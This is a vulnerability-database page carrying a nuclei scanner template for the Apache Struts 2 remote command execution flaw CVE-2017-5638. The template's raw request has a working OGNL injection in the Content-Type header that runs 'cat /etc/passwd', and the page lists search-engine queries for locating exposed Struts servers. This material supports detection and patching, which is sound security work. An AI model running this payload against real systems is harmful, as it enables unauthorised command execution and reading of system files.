Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache Struts 2 - Remote Command Execution

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 133 Views

Apache Struts 2 Remote Command Execution vulnerability allows remote attackers to execute arbitrary commands via crafted HTTP headers. Upgrade to 2.3.32 or 2.5.10.1 or apply patches

Related
Refs
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: A vulnerability in Apache Struts 2 affects IBM Platform Symphony and IBM Spectrum Symphony (CVE-2017-5638)
18 Jun 201801:35
ibm
IBM Security Bulletins		Security Bulletin:Vulnerability in Apache Struts affects Storwize V7000 Unified (CVE-2017-5638)
18 Jun 201800:34
ibm
IBM Security Bulletins		Security Bulletin: Apache Struts v2 Jakarta Multipart parser code execution affects IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation (CVE-2017-5638)
18 Jun 201801:35
ibm
IBM Security Bulletins		Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2017-5638)
15 Jun 201822:50
ibm
IBM Security Bulletins		Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem model V840
18 Jun 201800:32
ibm
IBM Security Bulletins		Security Bulletin: IBM Sterling Order Management is affected by a vulnerability (CVE-2017-5638)
16 Jun 201820:09
ibm
IBM Security Bulletins		WebSphere Application Server and IBM HTTP Server Security Bulletin List
13 Jul 202218:04
ibm
IBM Security Bulletins		Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem models 840 and 900
18 Feb 202301:45
ibm
IBM Security Bulletins		Security Bulletin: Vulnerability in Apache Struts affects SAN Volume Controller, Storwize family and FlashSystem V9000 products (CVE-2017-5638)
29 Mar 202301:48
ibm
IBM Security Bulletins		Security Bulletin: IBM OpenPages GRC Platform Web Applications are not vulnerable to (CVE-2017-5638)
15 Jun 201822:49
ibm
Rows per page
id: CVE-2017-5638

info:
  name: Apache Struts 2 - Remote Command Execution
  author: Random_Robbie
  severity: critical
  description: |
    Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.
  impact: |
    Remote attackers can execute arbitrary commands on the target system.
  remediation: |
    Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches.
  reference:
    - https://github.com/mazen160/struts-pwn
    - https://isc.sans.edu/diary/22169
    - https://github.com/rapid7/metasploit-framework/issues/8064
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5638
    - http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2017-5638
    cwe-id: CWE-20
    epss-score: 0.99999
    epss-percentile: 0.99993
    cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: struts
    shodan-query:
      - html:"Apache Struts"
      - http.title:"struts2 showcase"
      - http.html:"struts problem report"
      - http.html:"apache struts"
    fofa-query:
      - body="struts problem report"
      - title="struts2 showcase"
      - body="apache struts"
    google-query: intitle:"struts2 showcase"
  tags: cve2017,cve,apache,kev,msf,struts,rce,vkev,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: %{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#[email protected]@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#[email protected]@getResponse().getWriter(),#rw.println(#e),#rw.flush())}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220536b116665a6bd68b94869a8ef8dd137394472e43c9a53d6eb27e4c7f416eaec022036c24cffdb35dedb8238ace62eb1eb53c460813e6de3d0e00f0bee3a5a5fc7a8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
8.9High risk
Vulners AI Score8.9
CVSS 3.19.8
CVSS 210
EPSS0.99999
SSVC
cve-2017-5638apachestrutsremote command executionvulnerabilityupgradepatchessecurity advisory
133